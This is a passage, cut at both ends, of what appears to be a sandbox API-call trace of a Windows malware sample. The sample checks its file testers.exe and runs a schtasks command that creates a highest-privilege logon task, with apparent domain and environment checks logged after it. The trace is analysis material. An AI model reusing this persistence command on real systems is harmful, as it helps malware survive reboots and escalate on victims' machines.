ftLastWriteTime.dwLowDateTime=0x9ba588, ftLastWriteTime.dwHighDateTime=0x30, nFileSizeHigh=0x1, nFileSizeLow=0x0, dwReserved0=0x8a0000, dwReserved1=0x9bf2d8, cFileName="㧤", cAlternateFileName="")) returned 0xffffffff [0156.154] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x86f648, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0156.154] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1", nBufferLength=0x7fff, lpBuffer=0x86f648, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1", lpFilePart=0x0) returned 0x14 [0156.154] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:", cchCount1=2, lpString2="C:", cchCount2=2) returned 2 [0156.154] FindFirstFileW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFindFileData=0x87f660 | out: lpFindFileData=0x87f660*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xc8b274a0, ftCreationTime.dwHighDateTime=0x1d661bd, ftLastAccessTime.dwLowDateTime=0xc8b274a0, ftLastAccessTime.dwHighDateTime=0x1d661bd, ftLastWriteTime.dwLowDateTime=0xc3764e80, ftLastWriteTime.dwHighDateTime=0x1d661bd, nFileSizeHigh=0x0, nFileSizeLow=0xdc800, dwReserved0=0x87f7f0, dwReserved1=0x29ca9d, cFileName="testers.exe", cAlternateFileName="")) returned 0x91d5a8 [0156.154] FindClose (in: hFindFile=0x91d5a8 | out: hFindFile=0x91d5a8) returned 1 [0156.154] GetCurrentDirectoryW (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x14 [0156.154] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x2a) returned 0x9bf310 [0156.154] GetCurrentDirectoryW (in: nBufferLength=0x14, lpBuffer=0x9bf310 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0156.155] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x87f918*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x87f8e0 | out: lpCommandLine="C:\\Windows\\system32\\cmd.exe /c schtasks /create /sc onlogon /tn 2620738370 /rl highest /tr C:\\PROGRA~2\\COMMON~1\\testers.exe", lpProcessInformation=0x87f8e0*(hProcess=0x128, hThread=0x120, dwProcessId=0x318, dwThreadId=0x328)) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2890 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0156.173] CloseHandle (hObject=0x120) returned 1 [0156.173] CloseHandle (hObject=0x128) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e2778 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba588 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba600 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0156.173] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x91d568 | out: hHeap=0x8a0000) returned 1 [0156.173] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db060 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9ce8 | out: hHeap=0x8a0000) returned 1 [0156.173] PeekMessageW (in: lpMsg=0x87fccc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fccc) returned 0 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0156.173] CharUpperBuffW (in: lpsz="START_THE_SHOW", cchLength=0xe | out: lpsz="START_THE_SHOW") returned 0xe [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0156.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9ce8 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db060 [0156.173] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a80 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0156.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba588 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17d0 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17d0 | out: hHeap=0x8a0000) returned 1 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba690 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba660 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17d0 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1820 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x90) returned 0x8e5190 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8e5228 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5190 | out: hHeap=0x8a0000) returned 1 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0156.174] CharUpperBuffW (in: lpsz="HKLM64", cchLength=0x6 | out: lpsz="HKLM64") returned 0x6 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d90 [0156.174] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d90 | out: hHeap=0x8a0000) returned 1 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a60 | out: hHeap=0x8a0000) returned 1 [0156.174] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1860 | out: hHeap=0x8a0000) returned 1 [0156.175] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System", ulOptions=0x0, samDesired=0x20119, phkResult=0x87f6b0 | out: phkResult=0x87f6b0*=0x128) returned 0x0 [0156.175] RegQueryValueExW (in: hKey=0x128, lpValueName="EnableLinkedConnections", lpReserved=0x0, lpType=0x87f6bc, lpData=0x0, lpcbData=0x87f6ac*=0x0 | out: lpType=0x87f6bc*=0x0, lpData=0x0, lpcbData=0x87f6ac*=0x0) returned 0x2 [0156.175] RegCloseKey (hKey=0x128) returned 0x0 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e5228 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1870 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1820 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba600 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9d60 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba588 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ddf48 | out: hHeap=0x8a0000) returned 1 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a80 | out: hHeap=0x8a0000) returned 1 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ddf48 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba588 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a80 [0156.175] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba588 | out: hHeap=0x8a0000) returned 1 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de088 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba588 [0156.175] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d60 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba690 | out: hHeap=0x8a0000) returned 1 [0156.176] PeekMessageW (in: lpMsg=0x87fa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87fa74) returned 0 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1820 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0156.176] CharUpperBuffW (in: lpsz="DOMAINCHECK", cchLength=0xb | out: lpsz="DOMAINCHECK") returned 0xb [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de0b0 | out: hHeap=0x8a0000) returned 1 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba690 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8dafd0 [0156.176] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e17c0 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e17c0 | out: hHeap=0x8a0000) returned 1 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0b0 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e17c0 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba600 | out: hHeap=0x8a0000) returned 1 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba600 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de0d8 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1870 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a78 | out: hHeap=0x8a0000) returned 1 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf2d8 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a78 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de100 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1860 [0156.176] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9aa8 | out: hHeap=0x8a0000) returned 1 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf348 [0156.176] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9aa8 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de128 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a60 [0156.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba5e8 | out: hHeap=0x8a0000) returned 1 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5e8 [0156.177] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de150 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a70 [0156.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9cd0 | out: hHeap=0x8a0000) returned 1 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de178 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9cd0 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9d90 [0156.177] PeekMessageW (in: lpMsg=0x87f654, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f654) returned 0 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1830 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a50 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0156.177] CharUpperBuffW (in: lpsz="_WINAPI_NETGETJOININFORMATION", cchLength=0x1d | out: lpsz="_WINAPI_NETGETJOININFORMATION") returned 0x1d [0156.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0156.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba5d0 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a50 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba5a0 [0156.177] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a50 | out: hHeap=0x8a0000) returned 1 [0156.177] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a50 [0156.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1c8 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0156.178] PeekMessageW (in: lpMsg=0x87f124, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f124) returned 0 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1f0 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a40 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba618 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0156.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b68 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b80 [0156.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba630 [0156.178] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba648 [0156.178] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba558 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba510 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba528 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4b0 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4c8 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba468 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba480 [0156.179] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.179] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0156.180] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a10 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba450 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a10 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0156.180] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba438 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba450 | out: hHeap=0x8a0000) returned 1 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a10 | out: hHeap=0x8a0000) returned 1 [0156.180] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba438 | out: hHeap=0x8a0000) returned 1 [0156.181] HeapFree (in: 